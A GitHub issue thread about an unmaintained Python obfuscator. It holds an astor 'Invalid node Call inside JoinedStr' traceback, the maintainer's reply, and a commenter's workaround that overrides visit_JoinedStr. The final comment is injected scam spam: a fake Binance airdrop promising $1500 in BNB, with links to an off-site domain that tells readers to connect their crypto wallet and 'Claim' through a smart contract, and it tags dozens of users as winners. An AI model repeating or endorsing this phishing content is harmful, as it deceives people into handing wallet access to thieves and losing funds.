### ISSUE TITLE
AssertionError: Invalid node Call inside JoinedStr

### ISSUE THREAD

**Issue by bulingda** [ThePlasmaRailgun/ASTObfuscate#1]
`Traceback (most recent call last):
  File "astobfuscate.py", line 563, in <module>
    file_obj.write(astor.code_gen.to_source(root, indent_with=' '))
  File "/usr/local/lib/python3.7/site-packages/astor/code_gen.py", line 63, in to_source
    generator.visit(node)
  File "/usr/local/lib/python3.7/site-packages/astor/node_util.py", line 143, in visit
    return visitor(node)
  File "/usr/local/lib/python3.7/site-packages/astor/code_gen.py", line 878, in visit_Module
    self.write(*node.body)
  File "/usr/local/lib/python3.7/site-packages/astor/code_gen.py", line 178, in write
    visit(item)
  File "/usr/local/lib/python3.7/site-packages/astor/node_util.py", line 143, in visit
    return visitor(node)
  File "/usr/local/lib/python3.7/site-packages/astor/code_gen.py", line 335, in visit_FunctionDef
    self.body(node.body)
  File "/usr/local/lib/python3.7/site-packages/astor/code_gen.py", line 226, in body
    self.write(*statements)
  File "/usr/local/lib/python3.7/site-packages/astor/code_gen.py", line 178, in write
    visit(item)
  File "/usr/local/lib/python3.7/site-packages/astor/node_util.py", line 143, in visit
    return visitor(node)
  File "/usr/local/lib/python3.7/site-packages/astor/code_gen.py", line 293, in visit_Assign
    self.visit(node.value)
  File "/usr/local/lib/python3.7/site-packages/astor/node_util.py", line 143, in visit
    return visitor(node)
  File "/usr/local/lib/python3.7/site-packages/astor/code_gen.py", line 533, in visit_Call
    write(write_comma, arg)
  File "/usr/local/lib/python3.7/site-packages/astor/code_gen.py", line 178, in write
    visit(item)
  File "/usr/local/lib/python3.7/site-packages/astor/node_util.py", line 143, in visit
    return visitor(node)
  File "/usr/local/lib/python3.7/site-packages/astor/code_gen.py", line 565, in visit_JoinedStr
    self._handle_string_constant(node, None, is_joined=True)
  File "/usr/local/lib/python3.7/site-packages/astor/code_gen.py", line 622, in _handle_string_constant
    recurse(node)
  File "/usr/local/lib/python3.7/site-packages/astor/code_gen.py", line 619, in recurse
    assert False, 'Invalid node %s inside JoinedStr' % kind
AssertionError: Invalid node Call inside JoinedStr
`
How to solve this problem?

**Comment by fionafibration** [comment]
This project is like 2 years old and not maintained anymore and I can't even answer this without knowing more about what you're doing

**Comment by bulingda** [comment]
> This project is like 2 years old and not maintained anymore and I can't even answer this without knowing more about what you're doing

All right, thanks.

**Comment by fionafibration** [comment]
My guess is version issues or you're trying to obfuscate something which contains an AST node that's broken in the code somewhere

**Comment by LuoHeng2827** [comment]
@bulingda Because your code contains code like f"hello, {input_chars}",This Project obfuscate code do not handle node which type is JoinedStr .
Solve this problem have a easy way, ignore node which type is JoinStr, Override visit_JoinedStr method.
`def visit_JoinedStr(self, node: JoinedStr) -> Any:
    return node
`
By the way,this is a great project，I like it! @fionafibration

**Comment by arconejeros** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @myang, @nanometers, @estensen, @kmlroot, @alteregogi, @honeychai, @ptariche, @chengstone, @orah, @MatthieuScarset, @toadkicker, @s-ol, @damienstanton, @elldritch, @gzuhlwang, @bestquark, @javenisme, @shubhxms, @tx991020, @yihau, @shinnng, @madhuakula, @paulosiciliano, @mrluanma, @JustisK, @lounlee, @mayeaux, @crbcdcz, @syno-dev, @aggre, @WojasKrk, @kohlivarun5, @iamsamwood, @dreadrazor, @ShMcK, @Sun-Wukong, @freedomsky11, @charloco, @abmisx0, @royswale, @saltylight, @sidcode, @thonly, @ngiachou, @akittas, @bleib1dj, @PatrickAlphaC, @desfero, @morugu, @awentzonline
